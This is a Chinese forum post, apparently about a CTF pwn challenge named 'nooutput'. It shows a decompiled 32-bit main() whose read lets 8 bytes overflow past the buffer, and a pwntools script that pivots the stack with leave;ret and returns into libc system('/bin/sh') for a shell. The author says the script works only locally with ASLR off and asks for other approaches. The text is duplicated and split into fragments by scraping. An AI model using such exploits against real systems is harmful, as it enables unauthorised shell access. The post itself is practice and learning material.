IDA反编译结果:只有8个字节的溢出位,只能覆盖EBP和返回地址,看来是要栈迁移
如果利用一次leave ret把ESP迁移到BSS,那么也没有机会在BSS上写好栈内容! 所以不知道怎么做。请教各位大佬有没有什么办法。
下面是非正解:把系统的ASLR关了,用固定的栈地址做迁移,在本地getshell,但是如果打开ASLR,实际情况有几个问题:1,栈地址无法获取,2.libc版本不明,3.libc_base无法获取
以上exp只能在本地关闭aslr的情况下才能生效。请大佬想想其他的思路
int
__cdecl main()
{
char buf;
/
/
[esp
+
0h
] [ebp
-
100h
]
setvbuf(stdin,
0
,
2
,
0
);
setvbuf(stdout,
0
,
2
,
0
);
puts(
"Sorry,but there is no output!!\nJust Input Something:"
);
read(
0
, &buf,
0x108u
);
return
0
;
}
int
__cdecl main()
{
char buf;
/
/
[esp
+
0h
] [ebp
-
100h
]
setvbuf(stdin,
0
,
2
,
0
);
setvbuf(stdout,
0
,
2
,
0
);
puts(
"Sorry,but there is no output!!\nJust Input Something:"
);
read(
0
, &buf,
0x108u
);
return
0
;
}
from
pwn
import
*
context(arch
=
'i386'
, os
=
'linux'
)
context.terminal
=
[
'/usr/bin/tmux'
,
'splitw'
,
'-h'
]
leaveret_add
=
0x08048514
p
=
process(
'./nooutput'
)
lib
=
ELF(
"/usr/lib32/libc.so.6"
)
libc_base
=
0xf7dcd000
p.readuntil(
'Something:\n'
)
stackAddr
=
0xffffd498
log.info(
hex
(stackAddr))
sysAddr
=
libc_base
+
lib.symbols[
'system'
]
exitAddr
=
libc_base
+
lib.symbols[
'exit'
]
binsh
=
libc_base
+
lib.search(
"/bin/sh"
).
next
()
exploit
=
p32(
0x90909090
)
exploit
+
=
p32(sysAddr)
exploit
+
=
p32(exitAddr)
exploit
+
=
p32(binsh)
exploit
+
=
nops
*
(
0x100
-
len
(exploit))
exploit
+
=
p32(stackAddr)
exploit
+
=
p32(leaveret_add)
p.sendline( exploit)
p.interactive()
from
pwn
import
*
context(arch
=
'i386'
, os
=
'linux'
)
context.terminal
=
[
'/usr/bin/tmux'
,
'splitw'
,
'-h'
]
leaveret_add
=
0x08048514
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)